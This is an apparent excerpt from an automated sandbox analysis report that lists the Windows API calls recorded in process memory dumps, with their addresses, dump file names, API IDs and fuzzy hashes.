                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: 01150c12155b863dafcfdb4fdd27d34f0f89d6bcb102c063996354eb9c1320f3
                                                        • Instruction ID: b9214356e01a6c7dfdcc9c035083717b8fa04b29005a5fb08547e8f992f6896f
                                                        • Opcode Fuzzy Hash: 01150c12155b863dafcfdb4fdd27d34f0f89d6bcb102c063996354eb9c1320f3
                                                        • Instruction Fuzzy Hash: 45119171509380DFD712CF25DC49B96BFA4EF06220F0980ABED498B253D275A818CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CloseHandle.KERNELBASE(?), ref: 01F4A9C8
                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159677331.0000000001F4A000.00000040.00000001.sdmp, Offset: 01F4A000, based on PE: false
                                                        Similarity
                                                        • API ID: CloseHandle
                                                        • String ID:
                                                        • API String ID: 2962429428-0
                                                        • Opcode ID: d06039a41f835aec29e69c5eb0841cb9de27f1edddc51b55d603668323babfdb
                                                        • Instruction ID: b18cb6de3e79122b540ba3ba0ed01d72fdaabd3a71f84cb471cb5e8b196953ec
                                                        • Opcode Fuzzy Hash: d06039a41f835aec29e69c5eb0841cb9de27f1edddc51b55d603668323babfdb
                                                        • Instruction Fuzzy Hash: 2001A275904740DFEB10DF19DC897A6FFA4EF04220F08C4ABDD0A8F642D676A814CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159652543.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction ID: 38ab54cd57a2071c5e501dee1cf3ef63a3a5536fc490bc8bb01f7ae5d1b2582e
                                                        • Opcode Fuzzy Hash: e81a5c8897bc83f1f41697505171704b3ce40650641e4603deb56bc26f92147c
                                                        • Instruction Fuzzy Hash: 32D05E79604A818FE7168A1CD1A8BA53FA4AF55B04F4644F9F840CB6B3C769E581D200
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000020.00000002.2159652543.0000000001F42000.00000040.00000001.sdmp, Offset: 01F42000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction ID: 154db7143f671cb72c19d07afc92d9bfbb9b4aae0128e97d04b904176b41fc8b
                                                        • Opcode Fuzzy Hash: e5a5aab1af94072d1f914da0c60516348ce2f9743e167bc976f25470ca97d937
                                                        • Instruction Fuzzy Hash: 00D05E347006818FEB15CA1CD194F697BE4AF40700F0644F8BC008B266C7A5E880C600
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Executed Functions

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: 05bd58922e1d12b636333d2b5a34eecb5db0e7dc5f8e5f7e86e1e934fc91e78e
                                                        • Instruction ID: d9689203546f3e4f9e3df4bf645110249bed10770b5262b6f3fe98ee97c45498
                                                        • Opcode Fuzzy Hash: 05bd58922e1d12b636333d2b5a34eecb5db0e7dc5f8e5f7e86e1e934fc91e78e
                                                        • Instruction Fuzzy Hash: 322191755097849FEB138F25DC44B92FFB4EF06310F08859AE9898B5A3D271D908DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01CFAD37
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: AdjustPrivilegesToken
                                                        • String ID:
                                                        • API String ID: 2874748243-0
                                                        • Opcode ID: f6c1b15dd7994a4d257072faa92ca9b311b04bc3da85271c1a2d5be5f5dde438
                                                        • Instruction ID: 64ab028f8a5ad8d9246ca0c0ff892efd1e2c60dd9b89b831bd107dc956f55292
                                                        • Opcode Fuzzy Hash: f6c1b15dd7994a4d257072faa92ca9b311b04bc3da85271c1a2d5be5f5dde438
                                                        • Instruction Fuzzy Hash: 7C118C75500700DFEB618F55D884B66FBE4EF04321F08846AEE498B662D331E914CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: f23e8b140fb3cfe239106ca56baa5154ab865cf629f352f859eeede325fc8680
                                                        • Instruction ID: 14902d494ed73dadbfd99a83d48182c84a148d2efc1b557917eb019f463cae4a
                                                        • Opcode Fuzzy Hash: f23e8b140fb3cfe239106ca56baa5154ab865cf629f352f859eeede325fc8680
                                                        • Instruction Fuzzy Hash: 8F11A371509380DFD7228F15DC45F62FFB4EF06210F09849EED854B553C275A918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01CFB329
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationQuerySystem
                                                        • String ID:
                                                        • API String ID: 3562636166-0
                                                        • Opcode ID: 8200a65a84bd42bb13365a737489075ba1bfa9896c5221ddabe52298a65e50ed
                                                        • Instruction ID: a2001185889cddaff12004077b568a6eb08c4c52316d393765c85c55aec544a2
                                                        • Opcode Fuzzy Hash: 8200a65a84bd42bb13365a737489075ba1bfa9896c5221ddabe52298a65e50ed
                                                        • Instruction Fuzzy Hash: 4801AD35500740DFEB619F09D885B21FBA0EF04B20F08C19EDE890B612C771E918DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        • Opcode ID: 9fa8033d80b2144e7db5f19e24774eac40ab04fcc7f8cc1eb42f4bdb8e472331
                                                        • Instruction ID: cad53f04fb21b0628e300a6b2a7f85b7a1df7973017393c4fec42f46c4307751
                                                        • Opcode Fuzzy Hash: 9fa8033d80b2144e7db5f19e24774eac40ab04fcc7f8cc1eb42f4bdb8e472331
                                                        • Instruction Fuzzy Hash: 5031356650E3C08FE7138B759C65692BFB4AF03210F0E84DBD984CF1A3D6299809DB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 70f3d7c8087d24564662c85da16a305f5c2fd783f38fbb471d4ec9a04baed38b
                                                        • Instruction ID: e8bd609c3ec60b49492944cd7594960a1b23233ac6c2f69558b74ed48e4dcfa8
                                                        • Opcode Fuzzy Hash: 70f3d7c8087d24564662c85da16a305f5c2fd783f38fbb471d4ec9a04baed38b
                                                        • Instruction Fuzzy Hash: B2318471505380AFE722CF65CC45F52BFF8EF05210F09849EE9898B292D335A908CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 3ed810084c263a62ff8f7d6f45cdccd49b2da4a6f68206e78aaaedd712f71455
                                                        • Instruction ID: bc3f62b6bb0bafb2ed95232642b974e47660a136f35dcbba7b2767e1943d0b21
                                                        • Opcode Fuzzy Hash: 3ed810084c263a62ff8f7d6f45cdccd49b2da4a6f68206e78aaaedd712f71455
                                                        • Instruction Fuzzy Hash: 8931CA71509380AFE712DB25DC45B96BFE8DF06314F0844AAE984CF293D775A909CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: a52510b8edc461cc5841209000d14d07c639d81f781845dcef7e009a07bccee2
                                                        • Instruction ID: 3903a7f5e82931433a1db76832e9f6e9da0a571eee7f8b2fcefcf9eb43e7aa3a
                                                        • Opcode Fuzzy Hash: a52510b8edc461cc5841209000d14d07c639d81f781845dcef7e009a07bccee2
                                                        • Instruction Fuzzy Hash: 49318471509380AFE712CB61DC55F96BFB8EF06210F08859BE985DB192D225A908C761
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        • Opcode ID: 07699a546f999656dcd73ff1bcb91c5ddf7ea6cfcd3c23d4f7da29c8c8c73221
                                                        • Instruction ID: 5d43a5d2cc0ac08db18f75c181e0cd26f457d6a3648d2da68a66f26d4da53e9c
                                                        • Opcode Fuzzy Hash: 07699a546f999656dcd73ff1bcb91c5ddf7ea6cfcd3c23d4f7da29c8c8c73221
                                                        • Instruction Fuzzy Hash: 8B21B6B2509380AFE712CF24DC45B96BFB8EF06320F0885DBE985DB193D2659945C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        • Opcode ID: 2789615bf598d41069c7308d6c170f4385fe830993c0b1a81d9171697bf8387f
                                                        • Instruction ID: e5244d4b5940b6170d36e5ad6970979479f1f3e0a87ef65127122b6dda8b1872
                                                        • Opcode Fuzzy Hash: 2789615bf598d41069c7308d6c170f4385fe830993c0b1a81d9171697bf8387f
                                                        • Instruction Fuzzy Hash: 5831617550E3C05FD3138B358C55B55BFB4AF43610F1A81DBD8848F1A3D629A909C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        • Opcode ID: a5edef3c7f6f519a79e613ff703955c6b87c3e462dc1e885550624fbdb4a4b15
                                                        • Instruction ID: 5bb1869c64f44521da5698c2a8793e1d642deb7c0b39a88e5226d4fdfdf0eab2
                                                        • Opcode Fuzzy Hash: a5edef3c7f6f519a79e613ff703955c6b87c3e462dc1e885550624fbdb4a4b15
                                                        • Instruction Fuzzy Hash: 3F21A3B1505380EFE722CF15DC45FA6BFB8EF06220F0884AAE945DB152D764E948CB71
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        • Opcode ID: 49d6acf242c038e77b4c5b0627b2fa33a77d7976bd2e3efe06185736706a24be
                                                        • Instruction ID: 116411f23f396f26f83082ce4b2fbcefc3437f491b4e1ab12a9e1e6054755d54
                                                        • Opcode Fuzzy Hash: 49d6acf242c038e77b4c5b0627b2fa33a77d7976bd2e3efe06185736706a24be
                                                        • Instruction Fuzzy Hash: 2A21C97150D3C09FD312CB258C55B66BFB4EF47610F1981DFD8848F593D225A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 02740819
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        • Opcode ID: 448b2baca3461cb3b0b08655bdb74df4f7941595c9384c28e30f92d234b224e6
                                                        • Instruction ID: ee13d4d53af9d6576064d91e7404f1ec88836a3b5bad2e80d84f9cafed606e5f
                                                        • Opcode Fuzzy Hash: 448b2baca3461cb3b0b08655bdb74df4f7941595c9384c28e30f92d234b224e6
                                                        • Instruction Fuzzy Hash: 8C21F8B6508780AFE712CB159C41FA3BFA8EF46720F0881DAE9848B193D324A905C771
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02740502
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FolderPath
                                                        • String ID:
                                                        • API String ID: 1514166925-0
                                                        • Opcode ID: 3f0120a8ac8659e97450f99068324032b21e0bb002b46554a673d979c545cf43
                                                        • Instruction ID: ec3a25f8c202c3e1289beff75cbea40b1bbf53fd7007d9afaee317ecee241fab
                                                        • Opcode Fuzzy Hash: 3f0120a8ac8659e97450f99068324032b21e0bb002b46554a673d979c545cf43
                                                        • Instruction Fuzzy Hash: A3216D7550E3C0AFD3128B259C55B62BFB4EF47610F1A81CBD8848F693D225A919C7A2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0274072D
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: 5bd70cefc61144ea2ca6be32ed1e90468178f93f5df96134a61a42aace83b6ee
                                                        • Instruction ID: 50f84d9f671a27a2d1f68e65ef3c6eb279b21363e5e5e26cc364e315e586043f
                                                        • Opcode Fuzzy Hash: 5bd70cefc61144ea2ca6be32ed1e90468178f93f5df96134a61a42aace83b6ee
                                                        • Instruction Fuzzy Hash: 5D218E71500704EFEB21DF65DC85F66FBE8EF08650F04846EEA899B291D771E904CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 027408E5
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        • Opcode ID: 76e9015423b77c26088a22206cb92df0ef6bb21aa5397198781c4bce232e549e
                                                        • Instruction ID: cc7a470d6597ebc14c731cd4d1cb9ac94297ff671184b755c61f89346980e7cd
                                                        • Opcode Fuzzy Hash: 76e9015423b77c26088a22206cb92df0ef6bb21aa5397198781c4bce232e549e
                                                        • Instruction Fuzzy Hash: C121B271409380AFE722CF60DC45F56BFB8EF06310F09859BE9848B153C235A909CB62
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CFA94A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguagesPreferredThread
                                                        • String ID:
                                                        • API String ID: 842807343-0
                                                        • Opcode ID: fa74aaa7cc15cda807a8d5d9deaa164c2fed41881c3feff0240503e8741d5a3e
                                                        • Instruction ID: 4feae3b2411b08fb5636405a3e9cee6545ffc4974a19ca2b44bf2ac8906b9a6c
                                                        • Opcode Fuzzy Hash: fa74aaa7cc15cda807a8d5d9deaa164c2fed41881c3feff0240503e8741d5a3e
                                                        • Instruction Fuzzy Hash: B9219575509780AFD3138B259C51B62BFB4EF87710F0981DBE8888B653D224A919C7B2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • RegisterEventSourceW.ADVAPI32(?), ref: 02740DD6
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: EventRegisterSource
                                                        • String ID:
                                                        • API String ID: 1693822063-0
                                                        • Opcode ID: 95bef90f87ac2db9892278fb20d3e0f99e1433d9e63eeaf856296b2ca79b164e
                                                        • Instruction ID: a1a5d45c6fad9a3cc4ba45b0480c625b036af858a1ab78b1285948eb9cd59279
                                                        • Opcode Fuzzy Hash: 95bef90f87ac2db9892278fb20d3e0f99e1433d9e63eeaf856296b2ca79b164e
                                                        • Instruction Fuzzy Hash: 7D218171604240AFF724DF25DC85BA6FBE8EF05654F04846AED48DB282D775E904CA61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetTokenInformation.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFBDBC
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationToken
                                                        • String ID:
                                                        • API String ID: 4114910276-0
                                                        • Opcode ID: 14202dff291df2507fe0dffaa99b5479ff32509b4adb9432324c6cc48abab690
                                                        • Instruction ID: 5b13e5b86f0037e6359195ebb601abeb708eb866a7ed0cd359cf668a5f891d33
                                                        • Opcode Fuzzy Hash: 14202dff291df2507fe0dffaa99b5479ff32509b4adb9432324c6cc48abab690
                                                        • Instruction Fuzzy Hash: 11119072500304EFEB21DF55DC85FA6F7A8EF04360F04856AFA459A141D670E9048BB2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32GetModuleInformation.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFB0AE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationModule
                                                        • String ID:
                                                        • API String ID: 3425974696-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetDriveTypeW.KERNELBASE(?), ref: 02740FB0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: DriveType
                                                        • String ID:
                                                        • API String ID: 338552980-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetThreadUILanguage.KERNEL32(?), ref: 02741148
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: LanguageThread
                                                        • String ID:
                                                        • API String ID: 243849632-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • K32EnumProcessModules.KERNEL32(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 01CFAFBE
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumModulesProcess
                                                        • String ID:
                                                        • API String ID: 1082081703-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • ReadFile.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 027408E5
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileRead
                                                        • String ID:
                                                        • API String ID: 2738559852-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: Flags
                                                        • String ID:
                                                        • API String ID: 3401871038-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • UnmapViewOfFile.KERNELBASE(?), ref: 02740640
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileUnmapView
                                                        • String ID:
                                                        • API String ID: 2564024751-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CFAB1A
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: LookupPrivilegeValue
                                                        • String ID:
                                                        • API String ID: 3899507212-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetConsoleOutputCP.KERNEL32 ref: 01CFAA71
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleOutput
                                                        • String ID:
                                                        • API String ID: 3985236979-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetSystemInfo.KERNELBASE(?), ref: 0274099C
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InfoSystem
                                                        • String ID:
                                                        • API String ID: 31276548-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetFileType.KERNELBASE(?,00000E9C,74B68887,00000000,00000000,00000000,00000000), ref: 02740819
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID:
                                                        • API String ID: 3081899298-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleWrite
                                                        • String ID:
                                                        • API String ID: 2657657451-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetLogicalDrives.KERNELBASE ref: 01CFABC9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: DrivesLogical
                                                        • String ID:
                                                        • API String ID: 999431828-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CFBA7E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • EnumWindows.USER32(?,00000E9C,?,?), ref: 01CFA23E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: EnumWindows
                                                        • String ID:
                                                        • API String ID: 1129996299-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0274109E
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationVolume
                                                        • String ID:
                                                        • API String ID: 2039140958-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTitleW.KERNEL32(?), ref: 027401D0
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleTitle
                                                        • String ID:
                                                        • API String ID: 3358957663-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2159767655.0000000001CFA000.00000040.00000001.sdmp, Offset: 01CFA000, based on PE: false
                                                        Similarity
                                                        • API ID: ConsoleMode
                                                        • String ID:
                                                        • API String ID: 4145635619-0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0274132F
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.2167605460.0000000002740000.00000040.00000001.sdmp, Offset: 02740000, based on PE: false
                                                        Similarity
                                                        • API ID: AttributeConsoleText
                                                        • String ID:
                                                        • API String ID: 646522457-0
                                                        Uniqueness

